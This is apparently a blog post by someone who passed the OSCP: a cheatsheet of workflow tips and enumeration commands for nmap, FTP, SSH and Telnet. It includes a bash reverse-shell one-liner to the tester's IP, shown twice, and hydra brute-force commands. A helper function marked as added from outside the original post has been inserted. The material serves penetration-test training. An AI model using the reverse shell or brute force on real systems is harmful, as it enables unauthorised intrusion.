My OSCP Pentesting Cheatsheet



I had my OSCP exam on 14.03.2025 and on 17 March, three days later, I already received the confirmation that I had passed the OSCP exam!

This is my compiled and comprehensive list of useful commands that I have documented in my personal knowledge base. In this blog post you can find useful tips and commands about network and service enumeration, password guessing, reverse shells, Active Directory and Windows post exploitation that can be useful for penetration testing and the OSCP exam.

Some useful Tips

.env file

I created a separate directory for each machine that I hacked during my preparation and the OSCP exam. I then created an .env file in each of these directories and stored useful environment variables such as $TARGET_IP and $TARGET_DOMAIN in them:

export TARGET_IP="10.10.10.11"
export TARGET_DOMAIN="hackerask.com"

Then I could simply source the .env file whenever I wanted to work on this machine:

source .env

This is especially useful when you are working with multiple terminal tabs.

You can also use this file to store other environment variables that you use frequently, such as credentials, or to run scripts, such as starting a terminal logger.

$myip environment variable

I found it quite useful to have my IP address in a $myip environment variable. Since all the hacking lab platforms I use, such as HackTheBox, Proving Grounds or the challenge labs for my OSCP exam, use OpenVPN to get access to the machines, we can look at the tun0 network interface to see our local VPN IP address. We can look at it with ifconfig tun0 or ip addr show tun0.

To avoid having to type in the IP address every time I need it, I created a $myip environment variable that looks like this:

export myip=$(ip addr show tun0 2> /dev/null | grep 'inet ' | awk '{print $2}' | cut -d'/' -f1)

We can add the export line to our .bashrc or .zshrc and then source the file, to be able to use the environment variable:

$ echo -n "/bin/bash -i >& /dev/tcp/$myip/5555 0>&1"

/bin/bash -i >& /dev/tcp/192.168.178.10/5555 0>&1

This will output the reverse shell payload with our IP address of the tun0 network interface.

Copy Alias

I often have to copy the output of commands from the terminal to document them in my notes. Therefore I created an easy copy alias to pipe the output of a command into the clipboard.

I decided to use xclip, which can be installed with apt:

sudo apt install xclip

To create the alias, we can add the following line to the .bashrc or .zshrc file:

alias copy='xclip -selection clipboard'

And then restart the terminal session or source the file to be able to use it.

We can use the copy alias by appending it after a pipe:

echo -n "/bin/bash -i >& /dev/tcp/$myip/5555 0>&1" | copy

This will pipe the output of the echo command, the reverse-shell payload, to our clipboard.

Tmux

You should definitely learn and use tmux for the OSCP and for doing penetration tests/red team assignments. tmux is an excellent terminal multiplexer that allows you to manage multiple tabs and screens within a single window, making it easy to switch between various tabs with simple keyboard shortcuts.

Tmux Cheat Sheet & Quick Reference

Network Enumeration

General

Host Discovery

nmap -sn 192.168.178.1-254 -vv -oA hosts

cat hosts.nmap | grep "report for" | grep -v "down" | cut -f5 -d ' '

If nmap does not work, we can also try to ping the hosts:

for i in $(seq 1 254); do ping "172.16.115.$i" -c 1 -W 0.1|grep "icmp_seq=1"|cut -f4 -d ' '|tr ':' ' '; done

Port Scanning

My first step is usually to scan the machine quickly with nmap for open TCP ports:

$ sudo nmap -p- -vvv $TARGET_IP -oN enum/nmap/quick-scan.txt

Then I can use the following command to get all ports comma separated as output:

$ cat enum/nmap/quick-scan.txt | grep '/tcp' | cut -f1 -d '/' | tr '\n' ',' | sed 's/\(.*\),/\1 /'

Then we can use the open ports (here stored in $PORTS, the comma-separated list produced by the command above) to do a more detailed version scan:

$ nmap -p $PORTS -sC -sV -oA enum/nmap/resource $TARGET_IP
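As an added helper (not from the original post), the following shell function does the same job as the grep/cut/tr/sed pipeline above, but keeps only lines whose state is exactly "open". A quick scan run with -vvv also prints filtered ports, and a bare grep '/tcp' would feed those into the version scan. The scan file is a constructed sample, not output from a real host.

```shell
#!/bin/sh
# Constructed sample of an "nmap -p- -vvv ... -oN" quick scan (not a real host).
SAMPLE_FILE=$(mktemp)
cat > "$SAMPLE_FILE" <<'EOF'
# Nmap 7.94 scan initiated as: nmap -p- -vvv 10.10.10.11 -oN quick-scan.txt
Nmap scan report for 10.10.10.11
Host is up, received echo-reply ttl 63 (0.031s latency).
Scanned at 2025-03-14 10:00:00 CET for 12s
Not shown: 65530 closed tcp ports (reset)
PORT      STATE    SERVICE    REASON
21/tcp    open     ftp        syn-ack ttl 63
22/tcp    open     ssh        syn-ack ttl 63
80/tcp    open     http       syn-ack ttl 63
445/tcp   filtered microsoft-ds no-response
8080/tcp  open     http-proxy syn-ack ttl 63
# Nmap done at 2025-03-14 10:00:12 CET -- 1 IP address (1 host up) scanned in 12.34 seconds
EOF

# open_tcp_ports FILE
# Prints the open TCP ports from an -oN scan file as "21,22,80" with no
# trailing comma. Only rows whose first field is "<port>/tcp" and whose
# state is exactly "open" are kept, so filtered rows are ignored.
open_tcp_ports() {
    awk '$1 ~ /^[0-9]+\/tcp$/ && $2 == "open" {
             sub(/\/tcp$/, "", $1)
             if (ports == "") ports = $1; else ports = ports "," $1
         }
         END { print ports }' "$1"
}

# Usage: store the list in $PORTS for the follow-up version scan.
PORTS=$(open_tcp_ports "$SAMPLE_FILE")
echo "$PORTS"
```

With the sample above, $PORTS becomes 21,22,80,8080; the filtered port 445 is left out.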

After scanning the TCP ports, we should not forget to scan for UDP ports as well:

$ sudo nmap -Pn -n $TARGET_IP -sUV --top-ports=100 --reason -oA enum/nmap/resource-udp

TCP

21 - FTP

Anonymous Login:

ftp ftp://anonymous:anonymous@$TARGET_IP

Banner grabbing:

nc -vn $TARGET_IP 21

Download all files:

wget -m ftp://anonymous:anonymous@$TARGET_IP
wget -r --user="USERNAME" --password="PASSWORD" ftp://$TARGET_IP/

Brute force:

hydra -C /usr/share/wordlists/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt $TARGET_IP ftp

22 - SSH

Nmap:

# Check authentication methods:
nmap -p22 $TARGET_IP --script ssh-auth-methods --script-args="ssh.user=root"

# Retrieve version
nmap -p22 $TARGET_IP -sV

Brute force:

hydra -C /usr/share/wordlists/seclists/Passwords/Default-Credentials/ssh-betterdefaultpasslist.txt $TARGET_IP ssh

23 - Telnet

Banner Grabbing:

nc -vn $TARGET_IP 23

Nmap Enumeration:

nmap -n -sV -Pn --script...

